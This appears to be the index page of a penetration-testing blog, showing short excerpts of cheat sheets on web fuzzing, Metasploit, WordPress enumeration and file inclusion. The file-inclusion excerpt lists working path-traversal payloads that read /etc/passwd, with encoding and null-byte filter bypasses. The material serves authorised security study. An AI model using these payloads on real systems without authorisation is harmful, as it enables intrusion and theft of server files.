Attacking CMS – Joomla
Views: 7
PenTest 101 – Cheat Sheet
Views: 34 Command Description sudo nano /etc/hosts Opens the /etc/hosts with nano to start adding hostnames sudo nmap -p 80,443,8000,8080,8180,8888,10000 –open -oA web_discovery -iL scope_list Runs an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery) in all formats (-oA) eyewitness –web -x web_discovery.xml -d <nameofdirectorytobecreated> Runs eyewitness using a … Read more
Gobuster Cheat Sheet
Views: 55Common Gobuster Commands dir Mode With content length dns Mode With Show IP Base domain validation warning when the base domain fails to resolve Wildcard DNS is also detected properly: vhost Mode s3 Mode Available Modes Switch Description dir Directory brute-forcing mode dns DNS subdomain brute-forcing mode vhost Virtual host brute-forcing mode (not the … Read more
Complete Guide on ffuf
Views: 64Fuzz Faster U Fool – v1.3.1 TryHackMe has an excellent room to learn and practice this tool. Highly recommended for beginners. ffuf -h At a minimum we’re required to supply two options: -u to specify an URL and -w to specify a wordlist. The default keyword FUZZ is used to tell ffuf where the wordlist entries will be injected. ffuf … Read more
Punycode attacks
Views: 8
Fuff – Cheat Sheet
Views: 42Ffuf commands Command Description ffuf -h ffuf help ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing ffuf -w wordlist.txt:FUZZ -u https://FUZZ.nlabs.local/ Sub-domain Fuzzing ffuf -w wordlist.txt:FUZZ -u http://nlabs.local:PORT/ … Read more
File Inclusion – Cheat Sheet
Views: 28Local File Inclusion Command Description Basic LFI /index.php?language=/etc/passwd Basic LFI /index.php?language=../../../../etc/passwd LFI with path traversal /index.php?language=/../../../etc/passwd LFI with name prefix /index.php?language=./languages/../../../../etc/passwd LFI with approved path LFI Bypasses /index.php?language=….//….//….//….//etc/passwd Bypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 Bypass filters with URL encoding /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] Bypass appended extension with path truncation (obsolete) /index.php?language=../../../../etc/passwd%00 Bypass appended extension … Read more
Web Vulnerabilities – File Inclusion
Views: 26Path Traversal Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and abusing the web application’s URL to locate and access files or directories stored outside the application’s root directory. … Read more
Metasploit Cheat Sheet
Views: 38MSFconsole Commands Command Description show exploits Show all exploits within the Framework. show payloads Show all payloads within the Framework. grep meterpreter show payloadsgrep meterpreter grep reverse_tcp show payloads MSF – Searching for Specific Payload show auxiliary Show all auxiliary modules within the Framework. search <name> Search for exploits or modules within the Framework. … Read more
Enumerating WordPress with WPScan
Views: 44WPScan capabilities Update the local database of WPScan The local database can be updated with the following command: wpscan –update Enumeration Modes When enumerating the WordPress version, installed plugins or installed themes, you can use three different “modes”, which are: The following enumeration options exist: If no option is supplied to the -e flag, then the … Read more